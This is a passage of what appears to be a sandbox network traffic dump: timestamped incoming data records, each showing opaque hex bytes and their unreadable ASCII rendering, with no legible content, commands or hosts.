2022-01-30 12:43:46 UTC	1767	IN	Data Raw: b5 a4 25 0f dc 58 72 6f 66 03 4b 2b c1 84 34 21 4d ad 8e e9 33 bc 51 d5 70 8d 4c 06 ac 2d e7 94 5a 5b 1e 36 0d fa 74 3b 47 05 81 e3 c1 a3 ae f3 17 d5 d5 f6 db 56 be f9 27 3f b8 13 ac 7e dc 66 28 16 43 04 52 5e a4 f4 77 69 67 de 1d 49 78 09 36 38 a1 99 de 47 13 78 69 ee 0b a1 16 4c 8b 1c cf 53 29 05 e7 8c fe 67 31 a7 d4 76 7e ed 44 b0 1c ff 76 3d 66 eb 0b cb b1 27 c8 32 02 47 aa 85 16 28 7d 40 29 60 29 62 01 fd 3e 9a 79 c7 b1 da cf 79 9b c3 17 73 1d 81 f3 05 12 78 7f f7 7f 69 eb 60 4d 03 f5 d5 d9 5d 1f 51 9e 8a 1c 29 4e 35 3b 79 10 3e ca 64 61 a8 7e 17 d6 3a a7 20 c5 6d b0 f8 41 e1 54 27 b7 e2 30 21 17 83 2b ba 6a 8c 99 1e 92 86 c2 c5 9c 54 f6 d3 51 c5 72 d9 3e 92 46 1d f9 49 d8 48 68 61 a3 ba 72 41 51 dd f6 c9 d2 0e b8 dd fb 50 52 e1 5b 7d e1 42 9b d0 26 Data Ascii: %XrofK+4!M3QpL-Z[6t;GV'?~f(CR^wigIx68GxiLS)g1v~Dv=f'2G(}@)`)b>yysxi`M]Q)N5;y>da~: mAT'0!+jTQr>FIHharAQPR[}B&
2022-01-30 12:43:46 UTC	1775	IN	Data Raw: f1 c1 37 fa 05 e2 f4 81 bf bb ce d1 b6 30 43 ec 72 a1 1e 43 06 05 9b 72 c9 7a 6e 3a 09 53 45 64 82 a8 e7 07 d4 a1 59 16 4a 51 60 53 aa a7 76 c7 ed af 1d e2 28 e4 86 e2 d7 59 c2 12 19 13 9c 3d 51 da 78 2f 9f 5c 69 7a c9 9a 74 1c e6 b5 dd 18 26 70 2c 2e af 30 10 77 c5 ed a1 fd 4b 73 07 22 8e ac 1f ee 74 86 14 49 e4 c4 82 6a d8 89 53 5a 4a 56 2f 92 57 60 74 16 a5 33 91 b4 0c f1 bc c6 85 a0 68 ec b8 b1 ec 5a 2e 9d df 23 24 53 fa 36 82 af 27 1b 8a 83 6a 9d e0 6b 8e 7f ad 98 6f 40 e4 30 e7 88 18 26 74 69 e9 47 03 27 86 63 aa d9 56 25 53 6c 11 c2 c6 f5 3b f1 eb 5f 7c 87 f7 b8 26 0a 39 ae ca 80 1e ce 94 93 c5 8b a2 dc 37 a4 1a 25 de 65 b5 86 6d 48 52 c2 14 07 f5 58 18 83 7a 35 e2 59 3c 2d 05 82 71 66 eb ae 33 07 57 be 36 b6 64 b6 ef 6a ce 02 49 6d 9d f7 fa a0 7a Data Ascii: 70CrCrzn:SEdYJQ`Sv(Y=Qx/\izt&p,.0wKs"tIjSZJV/W`t3hZ.#$S6'jko@0&tiG'cV%Sl;_\|&97%emHRXz5Y<-qf3W6djImz
2022-01-30 12:43:46 UTC	1783	IN	Data Raw: d3 c3 cc 45 54 e0 fc 29 d9 06 1a 2a 42 db 8b 6b 11 5e a5 69 f2 7a 86 0e 83 12 f0 4d ca 95 0f 4a 91 e6 b6 44 b1 67 53 c0 d6 60 51 e5 bd ee 84 88 0f f7 1c f7 05 c2 85 19 bb a6 f4 1b 24 92 3d 7c a7 9e 9d 52 d4 2d 4a d4 17 01 b5 7d 7f 9c 25 54 9d 41 75 3b 1c fb 03 be d3 3e a9 6c f5 f9 a3 e5 82 96 cb 0d ef f2 3c 84 55 4b 10 dd bf bb e3 fc a9 d1 48 8b e0 e3 00 59 87 c1 e2 d0 90 75 98 29 6e 76 22 2c 31 2c 20 62 28 6a fa 18 5c af cd b3 e1 da 4c 4e e2 84 f3 26 4b 9c ab 8e e6 1c 43 f8 ee 8f 34 3b 05 12 c6 97 30 ba 64 9e 7b 96 0f 39 7f ed 4d 91 9f 4f 58 8f 0d 18 b5 e2 93 e3 c3 5a f3 8a fd 3f e2 b5 ff eb dc ba 18 03 fd cf dd 93 b7 81 7f c0 0e 95 54 f2 bf 81 b9 83 77 e7 82 cf af f1 4b ef 52 8c 9c f0 1e a0 ef 27 3e 2e b9 c2 44 a1 e2 51 8d b8 3b 21 76 d3 56 23 9e 4c 0a Data Ascii: ET)*Bk^izMJDgS`Q$=\|R-J}%TAu;>l<UKHYu)nv",1, b(j\LN&KC4;0d{9MOXZ?TwKR'>.DQ;!vV#L
2022-01-30 12:43:46 UTC	1790	IN	Data Raw: 74 98 07 b9 93 85 93 5c f9 b5 f5 1f cf 4f 17 34 26 5a 38 d5 5a 31 e3 ae 45 52 c1 33 2e 92 55 37 cb 34 4b db eb 6f 57 d6 c9 d7 fa 92 51 77 23 e3 fc 04 36 51 b9 f6 6c f5 53 fc 86 da cc 0c b9 74 db a5 fe 3a d2 68 34 b3 df c5 3d a4 8f 47 ef 69 d6 8d 1a a2 c6 16 9d f7 f6 c3 1a 2c bf 76 b1 f9 5d db 78 8f 6a 2c cc f5 d3 8d 3b 6a 4b 88 ab 30 39 84 c5 a8 90 73 db cb 3e 13 3b dc aa 81 6a dd eb 2d a2 09 1d 7a 67 1a e5 4c 59 3b 77 40 95 94 0d 29 dc a4 23 f6 66 28 ab bd 66 b5 b5 de 57 80 6c 0d 90 b3 fe c1 dc ce 77 e1 5a 36 15 75 66 52 9f 94 f5 17 ea 61 28 e2 4b 20 59 05 e0 d2 6d e0 85 9a b1 9b 1f f3 b8 54 5b d9 c4 0f 20 a6 a7 64 cf 8e 0b 31 c7 23 d1 83 c5 eb a5 69 61 a9 59 0a 6c 0f 94 81 2a 9e 19 95 f9 c1 9e 18 a9 99 51 2e b0 07 44 87 30 6c e3 dd ce 81 76 3b c4 d4 d6 Data Ascii: t\O4&Z8Z1ER3.U74KoWQw#6QlSt:h4=Gi,v]xj,;jK09s>;j-zgLY;w@)#f(fWlwZ6ufRa(K YmT[ d1#iaYl*Q.D0lv;
2022-01-30 12:43:46 UTC	1798	IN	Data Raw: c5 61 e5 fb b4 69 8d 1e f0 7f dc 3d d8 ae 7b 12 ee 4a c8 24 71 66 6b 59 1f 99 77 56 ca 33 c1 65 52 98 55 82 d8 13 8e 52 9f a0 5a 25 85 c6 7c 79 f7 76 51 0e f4 59 49 38 e4 a3 cb ef 12 3e 44 7b 0e 2f b2 f5 9a 95 f9 7a b9 e3 0b 8b dc 36 e0 79 25 e0 86 b1 af b2 3f e4 c6 37 64 0c 53 39 82 a6 a4 cf d3 4d 26 7e f5 d6 a1 af 92 de de d5 46 3c a3 42 1c 95 26 e5 10 ab a1 e1 28 11 a4 1e 53 cb aa 2c 55 c1 ec 0e 9c fb 19 57 79 5b 63 09 ca bf a2 f8 de 0b 51 9f 26 65 e3 e7 bc df 37 c7 5f a1 79 0d 59 88 d6 df 37 7e fe 1f 20 15 8e 83 bd dc 72 fe d8 32 4c c8 7f 6b 77 56 6e f3 a5 4c 01 30 c7 e0 e5 b6 4c 84 d8 e4 fc da ae 20 d5 ba ca bc f5 d0 86 71 82 8e 3b 1c 55 42 0d e4 64 6a b7 53 ad c1 7c 8e 78 b4 e3 eb 76 1c fa c9 b8 f0 db b9 c8 3b 5a 8b e3 d3 d3 3a ad 8a 59 6a 93 e9 e8 Data Ascii: ai={J$qfkYwV3eRURZ%\|yvQYI8>D{/z6y%?7dS9M&~F<B&(S,UWy[cQ&e7_yY7~ r2LkwVnL0L q;UBdjS\|xv;Z:Yj
2022-01-30 12:43:46 UTC	1806	IN	Data Raw: 09 28 0b 2a eb b2 13 ac 75 1f c2 17 af ff f4 42 90 f7 fa 3f 73 a0 fb ed 58 ac 42 37 4a 00 5c 3e f2 a1 cf 8f af 74 65 f5 26 5b 2b 44 e8 a0 92 2a d7 fd ca b9 97 d9 ef fa 7d 8b 12 55 4a 6c a7 1a a7 1c b7 f8 98 1b 51 26 ff b9 cd 09 ed 74 3e d1 1b 06 b5 5c 81 b7 ea e8 ca a0 4b 8f 72 bc ea a9 ca e1 e3 3e cb fc 44 b1 8d 5c e3 ba fb 08 67 85 45 cf e7 36 36 ab 87 3f b2 89 92 9f 91 ff 8d f9 eb ba fe 67 40 29 02 52 bb 7b 74 b8 f9 b0 f7 72 06 22 22 a4 79 59 fd ca 08 b5 03 d7 d2 51 c0 a9 f5 e4 64 18 df a1 68 4e 42 05 c3 0f 39 9b 49 7a 4e 15 d1 41 ba 80 99 6e d3 80 6a 0e 90 de e5 bb a3 89 c4 33 5f 21 df 5b 45 9d 32 68 54 e6 87 49 a6 71 64 a2 b7 a0 74 d7 77 b2 78 be 4e d2 d7 0b 52 44 09 d4 88 25 f6 67 99 47 05 80 7c 0b ea d3 cf 6a a1 5d 25 a6 60 ea cf 67 34 51 64 98 41 Data Ascii: (uB?sXB7J\>te&[+D}UJlQ&t>\Kr>D\gE66?g@)R{tr""yYQdhNB9IzNAnj3_![E2hTIqdtwxNRD%gG\|j]%`g4QdA
2022-01-30 12:43:46 UTC	1814	IN	Data Raw: 7c 39 ec e2 93 14 bf 36 cc 0a 1f 21 55 2f 3b bd cb b0 02 1c fb 6e c3 01 7c cc e4 85 8a 8c 4e df 8d 33 a5 22 2a f9 6f 1c 67 6d 18 6d d3 e9 f6 91 bf dc 97 57 3b fc 62 b0 d9 ef 05 83 ea 5e 96 d2 c0 ed 35 9d 2c 9b e7 b1 bd 6f a3 aa bd a2 d7 f2 90 b1 2a 57 b9 35 9f 64 ba 1a 5b 68 fa 7e cc 28 95 01 d0 86 d4 ec f3 cf f8 1d 8d a3 06 66 43 8d 85 b8 af c7 51 9c 5a 14 35 52 6d 9c 39 36 82 78 36 d7 6e 7a 90 24 de 24 94 c9 2d ea 2f 17 bf 9a d5 13 11 8c e1 52 e9 cc e2 8d db 13 d0 b0 18 5c 5c 4b 15 64 2d 41 b3 25 b4 d3 ef 77 9e 6d f4 6f 7d 3f 8d af 64 a1 3a fa 44 78 63 cc 19 7f c5 b8 7c be 36 1c f2 66 93 5d 94 88 a4 16 b3 b5 9a d2 02 08 ed 27 0a c7 c4 5e f2 99 24 1c 56 41 ec 77 6b ce fc b0 f9 8e 3e 24 3b 18 64 2c 0f d7 f8 b6 ba e7 7e 84 36 af ab 72 1f 92 95 c5 b1 33 66 Data Ascii: \|96!U/;n\|N3"ogmmW;b^5,oW5d[h~(fCQZ5Rm96x6nz$$-/R\\Kd-A%wmo}?d:Dxc\|6f]'^$VAwk>$;d,~6r3f
2022-01-30 12:43:46 UTC	1822	IN	Data Raw: 27 5e ff f5 f1 ef 48 d4 47 d8 b1 19 23 42 bc 39 00 e6 2c 06 19 40 df 11 a7 7d 04 7b 3c e7 e1 c2 71 f7 0a 49 5a 8f d0 11 29 d8 ef b0 ef f9 b1 60 f1 d9 78 bb 29 a7 b5 39 3b a0 93 bf 54 59 4b 15 df 64 75 bc e9 a5 3a 83 10 55 08 fd 0d 37 d7 52 2d f5 19 63 fb 2d 8c b8 31 51 3b c0 31 a4 d8 95 1f 83 33 42 d9 7b cf 6c 72 db eb d6 9d 57 80 1c df db d4 e3 b3 2b f0 aa db e9 a1 e9 3e dd 4c c6 88 61 1a 66 4b 4b 5e c3 07 70 d3 fc 05 97 9b 72 12 f5 f4 08 7d 76 81 fa 91 73 6e 23 2e 1b b7 f7 21 3f d9 e0 aa 9a 97 65 60 ea 21 d3 b2 51 f9 de c1 c2 e1 f4 87 3d b3 c0 a9 ed 72 63 42 14 99 ce 1a 69 7e 7d e8 0e 16 14 75 77 5c ff d6 1f 95 47 20 f6 b7 c2 1e d5 af 4c 38 a0 2c c7 a7 3d 6b 31 49 71 10 58 86 c7 ee 1a 39 43 de c9 c4 34 45 27 2c 9d 78 70 8b 9f 63 92 da 4d 08 69 55 fb 8e Data Ascii: '^HG#B9,@}{<qIZ)`x)9;TYKdu:U7R-c-1Q;13B{lrW+>LafKK^pr}vsn#.!?e`!Q=rcBi~}uw\G L8,=k1IqX9C4E',xpcMiU
2022-01-30 12:43:46 UTC	1829	IN	Data Raw: 51 45 5d 91 03 77 75 18 4d dc 3f 34 1f 72 1b f3 04 0e 33 19 65 ca f4 69 89 12 d0 2f 90 8a 54 ec 88 89 80 84 91 6c 56 5f 55 cd d9 d4 01 ab 32 b7 0f 08 e4 c9 ca b9 46 0e 0e 59 c4 45 35 0c 15 c1 31 0c 2b 2e 50 6c 01 b8 2f 34 1a 98 2f 52 24 74 6f 51 18 d9 5d c5 ae 41 d3 59 4c 48 04 0b 2e d5 3f 59 12 78 f9 a8 55 18 8e 1d e5 32 df 24 ae be 4f 2d cb c0 c6 80 b5 1e 81 3e 3a 9d 79 16 c5 e2 66 cc 1a c7 63 38 86 05 9b 31 65 a2 26 4c b0 a9 d2 45 08 1e 52 2c b3 39 1b 9b 34 c1 ef f0 4e a6 2a 0d f9 7e 57 21 dd 48 db be b3 f2 3a 3f cb c8 ec 9f ef 63 97 6f 3a fd 99 64 f0 9b a0 eb b0 3c 90 a4 e2 9a 3d 1a 62 34 9b 0c b9 db 3b 72 e0 cd e4 ba 54 ee 54 c2 c9 94 43 0d 26 30 28 25 db d5 d2 12 59 bc cd 2a c7 eb d0 6b 9e bd a4 87 f0 ea 41 9b 1b 32 3c b5 82 d9 ba 8e b6 a3 a0 eb 6e Data Ascii: QE]wuM?4r3ei/TlV_U2FYE51+.Pl/4/R$toQ]AYLH.?YxU2$O->:yfc81e&LER,94N~W!H:?co:d<=b4;rTTC&0(%YkA2<n
2022-01-30 12:43:46 UTC	1837	IN	Data Raw: 71 02 e1 93 46 60 dc 57 1a 00 75 e8 eb fd e6 bc 47 1c e9 24 2e 8b 5f e2 17 41 69 16 44 cb 8f 65 f1 eb 0d 69 a5 be f6 0d 26 0c 36 ed 00 f3 1d 71 e5 a8 00 f8 75 e2 0a 7c e6 53 54 ec 3a ef fb 0c e3 7a 71 f0 00 42 f0 1d 04 6b 51 97 76 f0 30 d6 54 37 52 33 f1 bd d2 f9 80 99 d9 85 e0 83 38 fb f2 d7 3e c5 7b 7b 04 89 3b 18 0a 50 c8 5d ca 4e 1d ae 73 5a d3 25 d4 8f af dc fb 67 70 9b 87 83 d7 30 4b f8 94 b6 66 25 b2 50 55 90 8e 50 37 03 e6 2f cc 2b 54 ef cb 4c 0d c4 bb 2a 89 77 bc bc 7e 6e 8e 0e ee 14 4a 44 22 8a 10 f4 f9 c4 3b a0 d7 42 4f f3 a8 ae b2 48 f9 98 da 89 64 ea 79 e6 81 d5 b3 4a 08 84 42 97 4e 77 06 27 ad 77 80 9e b0 ae bf 2a 20 d0 99 e4 9f 8e 99 f5 f5 f6 86 cf d7 85 c8 dd cd 7a 66 13 81 d9 77 93 e0 f7 86 6e d8 d6 5c df a6 b3 f1 39 d9 90 34 e4 d8 7c a2 Data Ascii: qF`WuG$._AiDei&6qu\|ST:zqBkQv0T7R38>{{;P]NsZ%gp0Kf%PUP7/+TLw~nJD";BOHdyJBNw'w zfwn\94\|
2022-01-30 12:43:46 UTC	1845	IN	Data Raw: 21 92 91 d0 f9 38 d6 14 2e a3 64 77 42 41 67 f8 93 43 e6 3e 82 82 7d 28 44 4f 50 c1 80 b7 84 f5 27 a1 98 85 e9 b7 61 28 d6 96 4f 0a 83 54 92 23 a0 48 20 9d 54 91 8a 77 2b a1 16 a7 fa 8e 62 de 2f b9 7e f0 29 8e 87 3c 0a 95 61 69 5e 43 71 d7 53 c7 9e 0c 53 54 1d 0c 55 ab 2e 43 9d 17 f6 55 c7 43 56 e3 3b 4b b9 42 c4 73 bc 4a 29 13 4b 31 1a 1a cd 8d fa 0c 18 d8 f8 7c 81 c6 1e 42 03 d8 b7 a8 3f 2e f0 84 40 c2 2a b4 94 7f e9 f1 62 3e 11 94 14 18 c5 0c 2a 7f 49 2f 2c 2a e6 1b 84 e0 67 3a 92 84 d5 6d 6d 82 d4 ab 53 e1 f0 ce 8a 25 98 96 b0 23 5a 7e cb 07 c7 60 11 c1 36 f8 6f e7 b8 40 e5 da c5 78 7d b1 04 14 e7 f5 54 27 0d 07 84 d2 cd 99 6c 86 5e 87 d0 be b3 76 11 e9 23 e2 4a 4f 66 3c 55 f4 09 62 fe 0a ab 94 99 a3 bc 28 bc ad 6f f0 c6 e9 0e c4 3d 9d 75 16 38 be e0 Data Ascii: !8.dwBAgC>}(DOP'a(OT#H Tw+b/~)<ai^CqSSTU.CUCV;KBsJ)K1\|B?.@b>I/,*g:mmS%#Z~`6o@x}T'l^v#JOf<Ub(o=u8
2022-01-30 12:43:46 UTC	1853	IN	Data Raw: 75 09 36 da 53 59 07 2a b5 be 14 1a dd ea ca 47 9e b4 cc 9d 5a 64 b1 92 2f 11 c7 57 18 6a b9 4c cb 05 c1 3a 15 5d fe e0 a8 73 e8 5a 20 de 89 8f 47 44 7f e1 42 bd c5 7a 6f ee 89 0f 74 20 de 1c a0 5b de ba f2 aa 4d f8 29 b9 d2 1e 6a 42 e5 36 25 4e b4 9e 3d c4 87 c1 a6 66 bd 62 43 8e 9f 90 d1 14 06 6a 3d 91 36 69 8b d5 18 93 0b bc 24 60 a0 4c 93 2d 2b e8 14 59 9e c5 1a 16 11 4b 16 06 5f 30 5d 52 16 c5 e9 60 70 db d5 c6 40 a8 74 98 9a 0e 87 12 a1 aa 15 8b 7e a7 63 0f a9 76 80 45 07 bb 3e 47 d7 5b ad 6f 60 ea c4 4a b9 56 04 a7 e8 7a 26 5f 5e 0e 95 86 59 94 e0 90 05 37 ef 77 4f 09 8f 71 b9 f7 05 62 b9 c3 9a f8 3e 80 97 0b c8 e0 23 67 4b 67 1a e0 4b 4f 3f 79 e7 98 51 8b c9 9e fb d9 a7 d7 ac 1a 29 04 e7 07 4f d0 16 bf 10 c5 83 a2 8a e4 44 f5 c4 6b 2d 4f 31 0e 46 Data Ascii: u6SY*GZd/WjL:]sZ GDBzot [M)jB6%N=fbCj=6i$`L-+YK_0]R`p@t~cvE>G[o`JVz&_^Y7wOqb>#gKgKO?yQ)ODk-O1F
2022-01-30 12:43:46 UTC	1861	IN	Data Raw: 4d f2 ce eb 12 27 c2 d6 ad 66 e7 5f 7b f5 d4 ed d5 e2 f9 b8 fa 86 35 43 a0 d3 58 74 fd ae 43 4b 78 67 fa 3b 9d 42 f5 d0 80 85 89 51 22 fd 67 de a9 f2 bf 3a 20 40 6e 08 d1 1e 5a 0c 73 3c 44 55 d5 6b 46 73 8f ce 4e ed 64 9b e1 16 cd 6b 10 42 c3 c8 f4 e2 cd 99 d1 6b bc be 14 2e cb 34 71 80 c9 37 a4 35 21 b2 0c ec fa 98 fb 91 44 be d1 5b 69 2e 01 15 53 b7 29 ab 81 f3 b1 35 59 0c 90 16 b3 c6 5e cb eb 27 bc ae 31 d0 4e c8 c0 5d 26 4f 8b b8 b1 f8 33 d8 69 48 d4 ed 06 57 56 3b 42 0f 3c 45 c8 94 37 28 03 4c 04 66 e9 47 b4 2f de 3e 5f 83 d0 b6 46 6a 12 6e 9b e4 d7 2c da f0 4c 10 0f 9d 62 77 d8 1c df ab 3d 9f 73 64 ef 38 cc bb e3 f5 5f 62 53 94 53 a4 7e 22 8f ed 26 f2 42 77 c5 af 98 4e 75 35 e0 65 24 f9 36 be 82 93 c1 fc ba 09 15 11 82 51 21 e4 d8 7d a3 ad 6b 2e 79 Data Ascii: M'f_{5CXtCKxg;BQ"g: @nZs<DUkFsNdkBk.4q75!D[i.S)5Y^'1N]&O3iHWV;B<E7(LfG/>_Fjn,Lbw=sd8_bSS~"&BwNu5e$6Q!}k.y
2022-01-30 12:43:46 UTC	1868	IN	Data Raw: 94 ba 85 75 6a 4e 41 68 37 fc 77 c2 3e 6c 61 a7 30 6f ea 6b 33 b0 11 d9 73 fd de 6e de 85 48 76 9f f0 cc 19 01 ab 11 c6 5f d8 a8 55 23 d5 ee 5a 96 3b f6 e6 59 b0 0c ff d1 3f cd f4 8f 13 e8 e2 ba 7a 98 f3 b6 31 bd 1f 32 e1 61 f6 c6 18 87 67 6f 66 41 54 bf 93 a3 80 cd 24 59 7a bd 13 d7 b9 80 33 62 d0 bb 92 72 04 25 27 b6 79 2b 70 4a 56 1a cd 6d 91 bc e2 b8 90 94 95 f5 65 9f 2b f2 94 0c 1a 4f 61 cc e8 48 9e 3c 65 a0 3b ab b0 a9 50 98 c3 f8 c8 f3 0e ab 2e 3c df 3c 05 19 b2 2e 1a b2 23 af 82 9c 54 fc ee 34 49 38 da 15 fc be e2 d1 df 72 84 15 6f b3 89 6e d4 b9 04 85 ef 05 9d e0 3c 30 d2 98 bf 21 0c 4c 15 8b 73 95 42 1a 86 9d b5 54 a9 11 6b a8 10 58 26 d4 46 a5 97 9e a4 de 71 b6 d5 33 b1 3d e7 c3 a2 ce 20 0c a5 83 a0 b6 63 ab e5 bd 05 89 a4 ea ef df 4f 9f 2f 65 Data Ascii: ujNAh7w>la0ok3snHv_U#Z;Y?z12agofAT$Yz3br%'y+pJVme+OaH<e;P.<<.#T4I8ron<0!LsBTkX&Fq3= cO/e
2022-01-30 12:43:46 UTC	1876	IN	Data Raw: 75 17 b6 36 f2 0f 75 89 e5 48 23 77 84 c7 6a ad e2 b4 b0 e7 ee 06 50 7b c0 d1 b9 78 13 94 45 8b 4a 30 63 a6 23 46 dd eb 78 56 be b1 8d e7 85 04 05 40 dd ab 69 9e 37 84 52 d3 57 5f d7 55 ba 6b 9b 89 09 94 b3 4f f0 10 ff d7 3a 72 fc e2 c1 57 94 cb 6f ce c5 ba 52 6b b2 c4 34 17 b5 fa 74 fd dd 78 6f 5f 9c b2 a9 53 e6 23 7b 5b 8a 55 33 53 f6 60 6f 95 18 17 19 12 83 9a 79 12 30 87 10 53 f3 06 07 76 05 f1 dc 24 5e ed dd ca 5e 55 63 e2 58 4f 1f dd 8a 38 6d 5e 0b 90 07 e2 3c 95 b6 96 72 1e 27 2f fe d6 11 4e 9e dc d0 eb 54 a3 e1 84 29 ac ff 8f 16 27 bb 47 73 a1 af b1 64 ec 16 2f c5 66 e5 4b 03 21 46 65 b5 42 f7 00 04 cc f2 50 10 87 b0 9e 85 9c e1 65 b5 02 64 71 31 dd 43 cb 21 9c b7 1a ba f4 72 38 f1 45 a8 1a 8c 48 7f e5 27 9e 30 96 9b bd 3f 17 c0 07 e0 73 c9 2a 62 Data Ascii: u6uH#wjP{xEJ0c#FxV@i7RW_UkO:rWoRk4txo_S#{[U3S`oy0Sv$^^UcXO8m^<r'/NT)'Gsd/fK!FeBPedq1C!r8EH'0?s*b
2022-01-30 12:43:46 UTC	1884	IN	Data Raw: ba 21 f5 7c 96 06 a0 0d 87 2a 6b 96 09 e3 7e 85 31 74 76 04 6d e9 9e 03 a2 4d 2b b8 88 60 c1 30 e4 7c 7a 8f d2 31 0c 59 53 fc c6 c1 5b db 7c 8b c4 fe db ed 5e 33 b2 3f c6 78 ea 73 b9 4f e5 d5 50 ae 6b e7 19 c7 9d 47 b7 45 a6 a5 e5 9f f4 aa c9 59 2a dd dd 09 69 1b 5c ac 66 80 0e 3c 86 e4 2e b0 63 52 61 1b f1 52 04 2e 4a 34 3c 74 46 e5 eb 12 f7 01 e3 18 b7 d9 d1 de 11 d5 1f f7 e0 55 15 1a af ff ca 24 24 75 af 85 a0 e1 f0 c7 43 63 46 72 f1 59 55 1f 37 c8 48 b1 75 cc e4 34 5c ba b2 9e f5 07 2c 21 f7 27 1d 88 33 e3 a8 a3 37 c2 9e 71 e4 dd f8 c6 a4 31 f7 d0 39 73 e0 dc a4 eb 08 6c ad e3 e0 d6 a3 17 f2 57 5b e2 22 ea f4 c2 cc 70 fa 5a 49 1e 30 af b7 3a 02 a0 a8 cb a3 e6 77 31 b4 cd e5 88 22 d3 2c 8c b4 0d 0c 9c f2 e0 2d d2 e2 05 32 4a 7b e7 94 68 73 a4 eb ac 82 Data Ascii: !\|k~1tvmM+`0\|z1YS[\|^3?xsOPkGEYi\f<.cRaR.J4<tFU$$uCcFrYU7Hu4\,!'37q19slW["pZI0:w1",-2J{hs
2022-01-30 12:43:46 UTC	1892	IN	Data Raw: 4b e2 68 bd a5 84 16 f1 9e fb 50 ea 8d 00 37 c1 5e 76 07 5a 09 8a 36 ef a0 98 08 01 1c 90 48 46 75 8f 7a 64 74 67 bd f8 30 59 8e a2 56 ae 52 57 46 7c 53 58 0b ef 59 9a ec f4 6f b6 d5 a0 a0 4a dd 0d 46 8d 28 2a e8 a6 58 5b 81 b2 27 4a 11 b4 51 3c e5 b7 de 3b 08 45 ef a9 b7 8a 6b 8e e0 b8 8c 6a 9f 3b 21 4e da 98 17 04 54 23 61 bb 27 e0 89 53 26 22 9e 65 ce aa b3 e2 3c 81 b2 84 6c a5 3d 23 65 3a 91 a1 d6 1b 16 cb 71 54 67 95 76 55 0d 15 26 ed c8 64 9e 39 bb 78 15 d1 03 1b 6c d6 59 f2 65 99 e8 2b a6 b3 0c bb 74 bb 69 0f b8 6b 2e 1a 3b 65 e3 d7 d7 c8 5c 45 40 59 63 a1 c3 93 4d 6b bd af 7e 70 bb 0b 43 15 45 d9 71 b4 67 8a 03 76 81 81 f6 64 e9 30 d6 20 b6 cd 6a 97 7f 09 bc 38 4e 97 94 dc 98 e6 ab dc f2 02 8f 7a 51 db 76 84 f5 cb 9f 3b 43 0e 94 ca fa b3 c1 28 98 Data Ascii: KhP7^vZ6HFuzdtg0YVRWF\|SXYoJF(*X['JQ<;Ekj;!NT#a'S&"e<l=#e:qTgvU&d9xlYe+tik.;e\E@YcMk~pCEqgvd0 j8NzQv;C(
2022-01-30 12:43:46 UTC	1900	IN	Data Raw: c4 5a 93 c0 04 58 43 5b e0 fc c0 17 e8 e3 4c d4 44 c6 cc 15 99 ef ea 0a 13 b9 f4 79 de b3 f8 e3 6a 59 94 bd 0e c0 1c c9 5d 51 f4 4b dd c8 ab 5c 91 3f 4f 35 35 d3 94 55 e5 5c 67 0d 7b 95 b4 0f 03 61 3e ee c8 40 db 86 81 ce 0f ce 61 c6 30 76 0e bb a0 45 b8 13 6d e5 7c 88 43 58 3a f4 ba c3 da 66 b3 c1 2d 2e 4e 39 24 8b 9c 54 d1 8b ac 58 59 94 b8 89 bb 89 7b 44 4a d0 7a a5 5b 4b 75 3c 21 5d 64 29 54 55 d7 6f 1d 10 b6 15 11 dd 85 41 6f 42 d1 c7 66 4b dc e3 15 7b d9 92 80 f2 12 28 c0 4b 65 b4 21 5d bc fe 8a e3 b8 c4 fd 9c 54 0f c1 df 06 58 47 7f a6 88 61 55 d8 72 27 ec 3d e2 14 14 40 95 5a bb 8a 96 2d 92 a7 38 fa a2 57 8f 0e 55 6b a1 58 65 fe 37 bf 93 55 b5 61 a0 da 79 bb 87 85 dc 1b 6e e3 83 87 d7 b8 31 0c d5 78 17 54 36 79 11 a8 0a 88 e3 dc 8e 07 8e fc d7 52 Data Ascii: ZXC[LDyjY]QK\?O55U\g{a>@a0vEm\|CX:f-.N9$TXY{DJz[Ku<!]d)TUoAoBfK{(Ke!]TXGaUr'=@Z-8WUkXe7Uayn1xT6yR
2022-01-30 12:43:46 UTC	1908	IN	Data Raw: 5f f3 ec 56 4b 32 a7 e1 d9 e7 ea 12 fe ee bf 7b be f1 90 c0 25 b3 84 3c f2 d4 55 ec a1 de 91 cb ae 90 07 91 12 08 34 3a 7b 41 f6 63 a8 42 72 0c 26 90 1a 78 6a bb 4b e4 7b d4 a5 a9 c0 38 26 5f 78 57 6f bb 00 69 cd a4 7e 71 6a 7f 3b 22 b0 9d b6 30 73 cc 2e 27 62 0f 2c fc 9f 98 a0 50 43 86 c8 f2 61 fb 7f d3 ef 87 b1 df 17 1d 73 f3 cf 2c 90 cd 98 0b e0 6f 66 ae e0 c1 55 55 0a f6 06 c2 a3 34 cb 83 b5 6a 3c 88 3c 2d 81 e2 c9 2e 7e 1f c1 ff 6a 4d 85 82 73 c9 20 77 0c f0 f9 dc e9 8f 63 38 e1 40 bf 41 1c ee d8 ac fe 19 10 a1 e1 9e c9 46 e6 c6 3f fb e6 e5 c2 56 11 d2 9d d6 2a be a4 0f 97 e6 62 72 30 2a 96 be de 1c 81 02 f1 22 94 13 5c 94 7c 29 a4 86 67 5a 43 c4 8c 69 5f e4 85 ed 41 50 e4 5b 44 aa 16 04 5c 1a 04 6e 3f 72 4e 8b c8 f9 30 ff 72 63 1e 17 33 a5 2b b8 56 Data Ascii: _VK2{%<U4:{AcBr&xjK{8&_xWoi~qj;"0s.'b,PCas,ofUU4j<<-.~jMs wc8@AF?Vbr0"\\|)gZCi_AP[D\n?rN0rc3+V
2022-01-30 12:43:46 UTC	1915	IN	Data Raw: 7e 66 3c 7d db 27 21 46 09 33 08 21 8e 88 01 a2 34 43 bc 9a 7c 05 fa c0 c8 db 03 c4 2f 3f a6 5c 0f 4a 6c f8 b3 8f 6f e8 8a 75 1d fa 4b ec 1d 43 ef 03 8e 9d 62 e0 6d 56 2a c8 07 37 49 ca 45 0e d7 21 c6 56 d1 08 ae 74 af 0c 88 da f9 2d ae 16 39 a8 6e bc 48 8d 89 16 8b 20 a2 ba 61 e7 58 5f a9 6e 3a 16 0d d8 fd 77 d0 10 40 9e 9e 63 16 06 8a 8f 52 af ac 68 fd 89 36 6d 36 c5 6c a5 e1 5c bf 78 bc 20 27 dd 3c e3 f4 ab 49 bf a0 7b 65 b6 60 7a 1a 89 8d 0b fe ec 3c 89 45 30 a0 de c0 00 35 ad 76 bf 46 68 a1 83 b1 9d aa f8 41 76 b0 6b a7 1a 4a 19 f9 4c 05 12 1b a3 ea 5b 6b 9e f1 db d2 3d 7e f5 76 3a 3c 28 29 6a 06 6b fd c2 de 2c f6 d5 25 ef 5e 60 70 a9 ba 2b 6e 30 0f 4d 3f 83 5f 36 de 0f 87 83 ac df bd 77 b6 6a ec 50 43 65 d8 ed 